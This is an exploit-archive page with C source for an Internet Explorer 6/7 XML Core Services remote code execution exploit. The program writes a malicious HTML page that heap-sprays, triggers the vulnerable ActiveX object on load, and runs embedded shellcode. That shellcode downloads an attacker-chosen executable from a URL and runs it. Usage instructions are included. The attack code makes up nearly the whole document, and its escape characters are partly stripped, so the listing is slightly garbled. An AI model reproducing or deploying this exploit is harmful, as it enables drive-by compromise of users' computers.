MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 3

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 3
# Published : 2006-11-10
# Author : M03
# Previous Title : MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 2
# Next Title : MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit
/*
*-----------------------------------------------------------------------
*
* MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit
*	Works on  Windows XP versions including SP2 and 2K 
*
* Author: M03
*
*	Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), 
*   Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
*          :
* Tested   : 
*          : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
*          :
*          :
*          :
*          :
*          :Usage: filename <exe_URL> [htmlfile]
*          :       filename.exe http://site.com/file.exe localhtml.htm      
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fp = NULL;
char *file = "MicroHack.htm";
char *url = NULL;

unsigned char sc[] =     
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF";

char * header =
"<html xmlns="http://www.w3.org/1999/xhtml">n"
"<body>n"
"<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >n"
"</object>n"
"<script>n"
"var obj = null;n"
"function exploit() {n"
"obj = document.getElementById('target').object;n"

"try {n"
"obj.open(new Array(),new Array(),new Array(),new Array(),new Array());n"
"} catch(e) {};n"

"sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +n"
" ";

char * footer =
"n"
"sz = sh.length * 2;n"
"npsz = 0x400000-(sz+0x38);n"
"nps = unescape ("%u0D0D%u0D0D");n"
"while (nps.length*2<npsz) nps+=nps;n"
"ihbc = (0x12000000-0x400000)/0x400000;n"
"mm = new Array();n"
"for (i=0;i<ihbc;i++) mm[i] = nps+sh;n"
"n"
"obj.open(new Object(),new Object(),new Object(),new Object(), new Object());n"    
"n"
"obj.setRequestHeader(new Object(),'......');n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"obj.setRequestHeader(new Object(),0x12345678);n"
"}n"
"</script>n"
"<body onLoad='exploit()' value='Exploit'>n"
"n"
"</body></html>n"
"n";

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
   int i;
   for(i=0;i<buffsize;i+=2)
   {
       if((i%16)==0)
       {
           if(i!=0)
           {
               printf(""n"");
               fprintf(fp, "%s", "" +n"");
           }
           else
           {
               printf(""");
               fprintf(fp, "%s", """);
           }
       }
           
       printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
       
       fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
     }
     

       printf("";n");
       fprintf(fp, "%s", "");n");          
   
   
   fflush(fp);
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};

   int sc_len = 0;


   if (argc < 2)
   {
      printf("MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit (0day)n");
      printf("Code modded from LukeHackn");
      printf("rnUsage: %s <URL> [Local htmlfile]rnn", argv[0]);
      exit(1);
   }
   
   url = argv[1];
   

    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'n");
        return;                
    }

      printf("[+] download url:%sn", url);
      
      if(argc >=3) file = argv[2];
      printf("[+] exploit file:%sn", file);
       
   fp = fopen(file, "w");
   if(!fp)
   {
       printf("[-] Open file error!n");
          return;
   }    
   
   fprintf(fp, "%s", header);
   fflush(fp);
   
   memset(buf, 0, sizeof(buf));
   sc_len = sizeof(sc)-1;
   memcpy(buf, sc, sc_len);
   memcpy(buf+sc_len, url, strlen(url));
   
   sc_len += strlen(url)+1;
   PrintPayLoad(buf, sc_len);
 
   fprintf(fp, "%s", footer);
   fflush(fp);  
   
   printf("[+] exploit write to %s success!n", file);
}

// Reverse Microsoft IE 9/11 Exploit

// www.Syue.com [2006-11-10]